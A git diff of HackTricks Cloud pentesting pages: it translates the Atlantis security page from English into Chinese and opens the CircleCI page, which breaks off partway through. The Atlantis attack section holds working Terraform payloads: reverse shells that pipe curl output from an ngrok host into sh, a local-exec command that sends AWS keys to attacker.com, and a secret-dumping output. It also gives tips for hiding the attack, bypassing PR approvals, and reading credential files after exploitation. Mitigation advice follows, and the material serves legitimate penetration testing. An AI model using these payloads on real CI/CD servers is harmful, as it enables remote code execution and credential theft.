的请求**,但更简单的方法是使用 Webhook Secret。 -Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. +请注意,除非你使用私有的 github 或 bitbucket 服务器,否则你需要将 webhook 端点暴露到互联网。 > [!WARNING] -> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. +> Atlantis 将 **暴露 webhooks**,以便 git 服务器可以向其发送信息。从攻击者的角度来看,了解 **你是否可以向其发送消息** 将是有趣的。 #### Provider Credentials -[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html) +[来自文档:](https://www.runatlantis.io/docs/provider-credentials.html) -Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. +Atlantis 通过简单地 **在托管 Atlantis 的服务器上执行 `terraform plan` 和 `apply`** 命令来运行 Terraform。就像在本地运行 Terraform 一样,Atlantis 需要你特定提供者的凭据。 -It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: +你可以选择如何 [提供凭据](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) 给 Atlantis: -- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. -- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. +- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) 和 [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) 有自己的提供者凭据机制。请阅读它们的文档。 +- 如果你在云中运行 Atlantis,那么许多云都有方法为在其上运行的应用程序提供云 API 访问权限,例如: +- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs)(搜索 "EC2 Role") +- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +- 许多用户设置环境变量,例如 `AWS_ACCESS_KEY`,在 Atlantis 运行的地方。 +- 其他人创建必要的配置文件,例如 `~/.aws/credentials`,在 Atlantis 运行的地方。 +- 使用 [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) 获取提供者凭据。 > [!WARNING] -> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. +> **运行** **Atlantis** 的 **容器** 很可能 **包含特权凭据**,用于 Atlantis 通过 Terraform 管理的提供者(AWS、GCP、Github...)。 #### Web Page -By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). +默认情况下,Atlantis 将在 **localhost 的 4141 端口运行一个网页**。此页面仅允许你启用/禁用 atlantis apply 并检查 repos 的计划状态并解锁它们(它不允许修改内容,因此不是很有用)。 -You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). +你可能不会发现它暴露在互联网上,但默认情况下 **不需要凭据** 来访问它(如果需要,`atlantis`:`atlantis` 是 **默认** 的)。 ### Server Configuration -Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. +对 `atlantis server` 的配置可以通过命令行标志、环境变量、配置文件或三者的混合来指定。 -- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) +- 你可以在 [**这里找到标志列表**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) 由 Atlantis 服务器支持 +- 你可以在 [**这里找到如何将配置选项转换为环境变量**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) -Values are **chosen in this order**: +值的 **选择顺序** 为: -1. Flags -2. Environment Variables -3. Config File +1. 标志 +2. 环境变量 +3. 配置文件 > [!WARNING] -> Note that in the configuration you might find interesting values such as **tokens and passwords**. +> 请注意,在配置中你可能会发现一些有趣的值,如 **令牌和密码**。 #### Repos Configuration -Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: +一些配置影响 **repos 的管理方式**。然而,可能 **每个 repo 需要不同的设置**,因此有方法指定每个 repo。这是优先顺序: -1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it. - 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows` -2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported) -3. **Default** values +1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) 文件。此文件可用于指定 atlantis 应如何处理该 repo。然而,默认情况下某些键在没有某些标志允许的情况下无法在此处指定。 +1. 可能需要通过标志如 `allowed_overrides` 或 `allow_custom_workflows` 进行允许 +2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config):你可以通过标志 `--repo-config` 传递它,这是一个 yaml 配置每个 repo 的新设置(支持正则表达式) +3. **默认** 值 **PR Protections** -Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended. +Atlantis 允许指示你是否希望 **PR** 被其他人 **`批准`**(即使在分支保护中未设置)和/或在运行 apply 之前 **`可合并`**(分支保护通过)。从安全角度来看,设置这两个选项是推荐的。 -In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**. +如果 `allowed_overrides` 为 True,这些设置可以在每个项目的 `/atlantis.yml` 文件中 **被覆盖**。 **Scripts** -The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.** +repo 配置可以 **指定脚本** 在 [**之前**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage)(_预工作流钩子_)和 [**之后**](https://www.runatlantis.io/docs/post-workflow-hooks.html)(_后工作流钩子_)执行 **工作流**。 -There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file. +没有任何选项允许在 **repo `/atlantis.yml`** 文件中 **指定** 这些脚本。 **Workflow** -In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ -Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** +在 repo 配置(服务器端配置)中,你可以 [**指定一个新的默认工作流**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow),或 [**创建新的自定义工作流**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**。** 你还可以 **指定** 哪些 **repos** 可以 **访问** 生成的新工作流。\ +然后,你可以允许每个 repo 的 **atlantis.yaml** 文件 **指定要使用的工作流**。 > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ -> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> 如果 [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个 repo 的 **`atlantis.yaml`** 文件中 **指定** 工作流。也可能需要 **`allowed_overrides`** 也指定 **`workflow`** 以 **覆盖将要使用的工作流**。\ +> 这基本上会给 **任何可以访问该 repo 的用户在 Atlantis 服务器上提供 RCE**。 > > ```yaml > # atlantis.yaml @@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor **Conftest Policy Checking** -Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include: +Atlantis 支持在计划输出上运行 **服务器端** [**conftest**](https://www.conftest.dev/) **策略**。使用此步骤的常见用例包括: -- Denying usage of a list of modules -- Asserting attributes of a resource at creation time -- Catching unintentional resource deletions -- Preventing security risks (ie. exposing secure ports to the public) +- 拒绝使用模块列表 +- 在创建时断言资源的属性 +- 捕获无意的资源删除 +- 防止安全风险(即将安全端口暴露给公众) -You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). +你可以在 [**文档中**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works) 查看如何配置它。 ### Atlantis Commands -[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: - +[**在文档中**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) 你可以找到运行 Atlantis 的选项: ```bash # Get help atlantis help @@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags] ## --verbose ## You can also add extra terraform options ``` - -### Attacks +### 攻击 > [!WARNING] -> If during the exploitation you find this **error**: `Error: Error acquiring the state lock` - -You can fix it by running: +> 如果在利用过程中发现此 **错误**: `Error: Error acquiring the state lock` +您可以通过运行以下命令来修复它: ``` atlantis unlock #You might need to run this in a different PR atlantis plan -- -lock=false ``` +#### Atlantis plan RCE - 在新PR中修改配置 -#### Atlantis plan RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. - -You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file: +如果您对一个仓库具有写入权限,您将能够在其上创建一个新分支并生成一个PR。如果您可以**执行 `atlantis plan`**(或者可能是自动执行的)**您将能够在Atlantis服务器内部进行RCE**。 +您可以通过让[**Atlantis加载外部数据源**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source)来做到这一点。只需在`main.tf`文件中放入如下有效负载: ```json data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] } ``` +**更隐蔽的攻击** -**Stealthier Attack** - -You can perform this attack even in a **stealthier way**, by following this suggestions: - -- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +您可以通过遵循以下建议以**更隐蔽的方式**执行此攻击: +- 不要直接将反向 shell 添加到 terraform 文件中,您可以**加载一个外部资源**,该资源包含反向 shell: ```javascript module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" } ``` +您可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码。 -You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) +- 在外部资源中,使用 **ref** 功能来隐藏 **repo 中分支的 terraform rev shell 代码**,类似于:`git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- **而不是** 创建一个 **PR 到 master** 来触发 Atlantis,**创建 2 个分支**(test1 和 test2),并从一个分支创建一个 **PR 到另一个分支**。当您完成攻击后,只需 **删除 PR 和分支**。 -- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. - -#### Atlantis plan Secrets Dump - -You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file: +#### Atlantis 计划秘密转储 +您可以通过在 terraform 文件中放置类似以下内容来 **转储 terraform 使用的秘密**,运行 `atlantis plan`(`terraform plan`): ```json output "dotoken" { - value = nonsensitive(var.do_token) +value = nonsensitive(var.do_token) } ``` +#### Atlantis apply RCE - 在新PR中修改配置 -#### Atlantis apply RCE - Config modification in new PR +如果您对一个仓库具有写入权限,您将能够在其上创建一个新分支并生成一个PR。如果您可以**执行 `atlantis apply`,您将能够在Atlantis服务器内部进行RCE**。 -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. +然而,您通常需要绕过一些保护措施: -However, you will usually need to bypass some protections: - -- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). - - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) -- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) - -Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -You just need to make sure some payload like the following ones ends in the `main.tf` file: +- **可合并**:如果在Atlantis中设置了此保护,您只能在**PR可合并时运行 `atlantis apply`**(这意味着需要绕过分支保护)。 +- 检查潜在的[**分支保护绕过**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **已批准**:如果在Atlantis中设置了此保护,**其他用户必须批准PR**,您才能运行 `atlantis apply` +- 默认情况下,您可以滥用[**Gitbot令牌来绕过此保护**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +在恶意Terraform文件上运行**`terraform apply`,使用**[**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**。**\ +您只需确保一些有效载荷,如以下内容,结束在 `main.tf` 文件中: ```json // Payload 1 to just steal a secret resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } +provisioner "local-exec" { +command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" +} } // Payload 2 to get a rev shell resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } +provisioner "local-exec" { +command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" +} } ``` +遵循**前一种技术的建议**以更**隐蔽的方式**执行此攻击。 -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. - -#### Terraform Param Injection - -When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: +#### Terraform 参数注入 +当运行 `atlantis plan` 或 `atlantis apply` 时,terraform 在后台运行,您可以通过在 atlantis 中评论类似的内容来向 terraform 传递命令: ```bash atlantis plan -- atlantis plan -- -h #Get terraform plan help @@ -256,18 +243,17 @@ atlantis plan -- -h #Get terraform plan help atlantis apply -- atlantis apply -- -h #Get terraform apply help ``` +可以传递的内容是环境变量,这可能有助于绕过某些保护。请查看 terraform 环境变量在 [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) -Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) +#### 自定义工作流 -#### Custom Workflow - -Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ -This possibility was mentioned in a previous section: +运行在 `atlantis.yaml` 文件中指定的 **恶意自定义构建命令**。Atlantis 使用来自拉取请求分支的 `atlantis.yaml` 文件,**而不是** `master`。\ +这个可能性在前面的部分中提到过: > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. +> 如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个仓库的 **`atlantis.yaml`** 文件中 **指定** 工作流。还可能需要 **`allowed_overrides`** 也指定 **`workflow`** 以 **覆盖将要使用的工作流**。 > -> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> 这基本上会给 **任何可以访问该仓库的用户在 Atlantis 服务器上提供 RCE**。 > > ```yaml > # atlantis.yaml @@ -286,99 +272,97 @@ This possibility was mentioned in a previous section: > - run: my custom apply command > ``` -#### Bypass plan/apply protections - -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**. +#### 绕过计划/应用保护 +如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allowed_overrides` _已_ 配置 `apply_requirements`,则仓库可以 **修改计划/应用保护以绕过它们**。 ```yaml repos: - - id: /.*/ - apply_requirements: [] +- id: /.*/ +apply_requirements: [] ``` - #### PR Hijacking -If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. +如果有人在您的有效拉取请求上发送 **`atlantis plan/apply`** 评论,这将导致 terraform 在您不希望它运行时执行。 -Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE. +此外,如果您没有在 **分支保护** 中配置在 **新提交推送** 到它时要求 **重新评估** 每个 PR,那么有人可能会在 terraform 配置中 **编写恶意配置**(查看之前的场景),运行 `atlantis plan/apply` 并获得 RCE。 -This is the **setting** in Github branch protections: +这是 Github 分支保护中的 **设置**: ![](<../images/image (216).png>) #### Webhook Secret -If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. +如果您设法 **窃取 webhook secret** 或者 **没有使用任何 webhook secret**,您可以 **调用 Atlantis webhook** 并 **直接调用 atlantis 命令**。 #### Bitbucket -Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. +Bitbucket Cloud **不支持 webhook secrets**。这可能允许攻击者 **伪造来自 Bitbucket 的请求**。确保您只允许 Bitbucket 的 IP。 -- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. -- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). +- 这意味着 **攻击者** 可以向 **Atlantis** 发出看似来自 Bitbucket 的 **虚假请求**。 +- 如果您指定了 `--repo-allowlist`,那么他们只能伪造与那些仓库相关的请求,因此他们能造成的最大损害就是在您自己的仓库上进行计划/应用。 +- 为了防止这种情况,请允许 [Bitbucket 的 IP 地址](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html)(请参见出站 IPv4 地址)。 ### Post-Exploitation -If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: +如果您设法访问了服务器,或者至少获得了 LFI,有一些有趣的内容您应该尝试读取: -- `/home/atlantis/.git-credentials` Contains vcs access credentials -- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate -- `/proc/1/environ` Env variables -- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) +- `/home/atlantis/.git-credentials` 包含 vcs 访问凭据 +- `/atlantis-data/atlantis.db` 包含更多信息的 vcs 访问凭据 +- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform 状态文件 +- 示例:/atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate +- `/proc/1/environ` 环境变量 +- `/proc/[2-20]/cmdline` `atlantis server` 的命令行(可能包含敏感数据) ### Mitigations #### Don't Use On Public Repos -Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. +因为任何人都可以在公共拉取请求上评论,即使有所有可用的安全缓解措施,在没有适当配置安全设置的情况下,在公共仓库上运行 Atlantis 仍然是危险的。 #### Don't Use `--allow-fork-prs` -If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. +如果您在公共仓库上运行(不推荐,见上文),您不应该设置 `--allow-fork-prs`(默认为 false),因为任何人都可以从他们的分叉向您的仓库打开拉取请求。 #### `--repo-allowlist` -Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: +Atlantis 要求您通过 `--repo-allowlist` 标志指定一个允许列表,接受来自该列表的 webhook。例如: -- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -- Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. +- 特定仓库:`--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +- 您的整个组织:`--repo-allowlist=github.com/runatlantis/*` +- 您的 GitHub 企业安装中的每个仓库:`--repo-allowlist=github.yourcompany.com/*` +- 所有仓库:`--repo-allowlist=*`。在受保护的网络中使用时很有用,但如果没有设置 webhook secret 则很危险。 -This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. +此标志确保您的 Atlantis 安装不会与您不控制的仓库一起使用。有关更多详细信息,请参见 `atlantis server --help`。 #### Protect Terraform Planning -If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. +如果攻击者提交带有恶意 Terraform 代码的拉取请求在您的威胁模型中,那么您必须意识到 `terraform apply` 的批准是不够的。可以使用 [`external` 数据源](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) 或通过指定恶意提供程序在 `terraform plan` 中运行恶意代码。然后,这段代码可能会窃取您的凭据。 -To prevent this, you could: +为了防止这种情况,您可以: -1. Bake providers into the Atlantis image or host and deny egress in production. -2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. -3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. +1. 将提供程序打包到 Atlantis 镜像中或托管并在生产中拒绝出站。 +2. 在内部实现提供程序注册协议并拒绝公共出站,这样您可以控制谁有写入注册表的权限。 +3. 修改您的 [服务器端仓库配置](https://www.runatlantis.io/docs/server-side-repo-config.html) 的 `plan` 步骤,以验证不允许的提供程序或数据源的使用或不允许用户的 PR。您还可以在此时添加额外的验证,例如在允许 `plan` 继续之前要求 PR 上的“点赞”。Conftest 在这里可能会有用。 #### Webhook Secrets -Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). +Atlantis 应该通过 `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` 环境变量设置 webhook secrets。即使设置了 `--repo-allowlist` 标志,如果没有 webhook secret,攻击者也可以伪装成允许列表中的仓库向 Atlantis 发出请求。Webhook secrets 确保 webhook 请求实际上来自您的 VCS 提供商(GitHub 或 GitLab)。 -If you are using Azure DevOps, instead of webhook secrets add a basic username and password. +如果您使用 Azure DevOps,请添加基本用户名和密码,而不是 webhook secrets。 #### Azure DevOps Basic Authentication -Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. +Azure DevOps 支持在所有 webhook 事件中发送基本身份验证头。这需要为您的 webhook 位置使用 HTTPS URL。 #### SSL/HTTPS -If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. +如果您使用 webhook secrets,但您的流量是通过 HTTP,那么 webhook secrets 可能会被窃取。使用 `--ssl-cert-file` 和 `--ssl-key-file` 标志启用 SSL/HTTPS。 #### Enable Authentication on Atlantis Web Server -It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. +强烈建议在 Web 服务中启用身份验证。使用 `--web-basic-auth=true` 启用 BasicAuth,并使用 `--web-username=yourUsername` 和 `--web-password=yourPassword` 标志设置用户名和密码。 -You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. +您还可以将这些作为环境变量传递 `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` 和 `ATLANTIS_WEB_PASSWORD=yourPassword`。 ### References @@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` - [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md index 8b8a1fea1..4320ea6d3 100644 --- a/src/pentesting-ci-cd/circleci-security.md +++ b/src/pentesting-ci-cd/circleci-security.md @@ -1,259 +1,235 @@ -# CircleCI Security +# CircleCI 安全 {{#include ../banners/hacktricks-training.md}} -### Basic Information +### 基本信息 -[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) 是一个持续集成平台,您可以在其中**定义模板**,指示您希望它对某些代码做什么以及何时执行。通过这种方式,您可以**自动化测试**或**部署**,例如直接**从您的代码库主分支**进行。 -### Permissions +### 权限 -**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ -In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). +**CircleCI** **继承了**与登录的**账户**相关的github和bitbucket的权限。\ +在我的测试中,我检查到,只要您在github上对代码库拥有**写权限**,您就能够**管理CircleCI中的项目设置**(设置新的ssh密钥,获取项目api密钥,使用新的CircleCI配置创建新分支...)。 -However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. +然而,您需要是**代码库管理员**才能**将代码库转换为CircleCI项目**。 -### Env Variables & Secrets +### 环境变量和秘密 -According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. +根据[**文档**](https://circleci.com/docs/2.0/env-vars/),在工作流中有不同的方法来**加载环境变量中的值**。 -#### Built-in env variables +#### 内置环境变量 -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. +每个由CircleCI运行的容器将始终具有[**文档中定义的特定环境变量**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables),如`CIRCLE_PR_USERNAME`、`CIRCLE_PROJECT_REPONAME`或`CIRCLE_USERNAME`。 -#### Clear text - -You can declare them in clear text inside a **command**: +#### 明文 +您可以在**命令**中以明文声明它们: ```yaml - run: - name: "set and echo" - 